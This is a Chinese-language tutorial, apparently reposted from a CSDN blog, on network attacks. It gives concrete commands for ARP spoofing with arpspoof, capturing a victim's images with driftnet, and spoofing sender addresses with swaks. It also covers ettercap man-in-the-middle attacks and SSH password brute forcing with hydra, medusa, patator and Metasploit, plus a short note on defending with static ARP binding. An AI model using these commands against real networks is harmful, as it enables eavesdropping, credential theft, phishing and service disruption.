一、ARP欺骗攻击:
通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网上上特定计算机或所有计算机无法正常连线。
1、arp欺骗命令:arpspoof -i 网卡 -t 目标ip 网关(这样的arp欺骗攻击可以令目标机器断网)
例如:arpspoof -i eth0 -t 192.168.0.101 192.168.0.1
2、还可以利用arp欺骗获取目标ip的流量信息,从而获取目标ip的图片,原理是内网中目标ip流量经过自己网卡,然后从网关出去。
命令:
echo 1 >/proc/sys/net/ipv4/ip_forward
(1表示允许目标IP流量转发,0是禁止,默认禁止)
arpspoof -i eth0 -t 172.19.4.113 172.19.0.1
(开启arp欺骗,这时是可以上网的)
driftnet -i eth0
(获取目标ip的图片)
3、扫描内网内其他IP
命令:fping -asg 172.19.0.0/24
二、利用swkas制作伪造邮箱
1、swkas命令的一些参数
–header :邮件头内容(不明)
–header :“Subject:主题” 可设定邮件主题
-t 或–to :目标地址 -t test@test.com 发送的目标地址
-f 或–from :来源地址 (发件人) -f “texttext@text.com” 伪造的邮箱地址
–body :邮件内容,如果想发送文件的话可以
2、演示代码
swaks -q -rcpt -t 邮件地址
(该命令可以在连接到目标地址后中断连接,用于测试收件人地址是否存在/是否可以连接成功.)
Swaks --body “内容” --header “邮件头” -t XXXX@qq.com -f “伪造的邮箱地址”
三、Wireshark抓包工具
1、wireshark的开始图形界面:
2、抓包筛选器:
3、随便抓的ping包:
4、保存抓取的包:
5、抓包过滤:
四、中间人攻击工具
原理:一台主机要访问一个网站,那么它的数据包肯定要经过网关,网关再访问网站。网关也有自己的mac地址,我们(黑客)作为中间人可以向主机发送arp包(让主机认为我才是网关),当主机把黑客机当成网关后,数据包就会经过黑客的主机,登录网站的一些账户密码信息也会泄露出去。
利用的工具:ettercap
攻击实例:
1、打开ettercap
2、对ettercap的操作
当你被中间人攻击如何察觉:
中间人攻击的防御:把网关mac地址设置成静态
命令1:netsh i i show in
(获取本地连接的idx值)
命令2:netsh -c i i ad ne (idx值) (网关ip地址) (网关mac地址) store=persistent
(将网关mac地址由动态设置成静态,并且永久有效。)
如果你想将网关mac地址还原成动态,执行命令:netsh -c i i delete neighbors (idx值)
在LINUX下网关mac地址静态绑定命令: arp -s
五、SSH密码破解
1、Hydra(海德拉),用于暴力破解的一款工具。
使用方法介绍:
-l:指定账号
-L:账号字典
-p:指定密码
-P:密码字典
-M: 开启了ssh服务的服务器ip字典(一般黑客都会利用nmap去扫描一个网站的c段ip,然后查看他们的ssh服务是否开启了,若开启则利用hydra去爆破密码)
-o:将爆破后的内容输入到一个特定文件,例如输入到一个文本里面
实例操作:
2、工具:medusa(美杜莎)
使用方法介绍:
-M:服务模块
-h/H: 服务器ip/服务器ip字典
-u/U:用户名/用户名字典
-p/-P:密码/密码字典
-t:线程数(线程越大速度越快)
-o:存储到指定文件
3、工具:patator
使用方法介绍:
Ssh_login:开启对ssh服务的爆破
User=FILE0 0=user.txt:采用某个用户字典
Password=FILE1 1=password.txt :采用某个密码字典
-x ignore:mesg=‘Authentication failed.’:将错误匹配的账号密码都 不显示在结果上
4、工具:MSF
使用方法:
选择暴力破解模块
查看一下需要配置什么信息
这里设置了目标ip 账号密码字典,下面显示了爆破结果
转载:https://blog.csdn.net/xf555er/article/details/104848872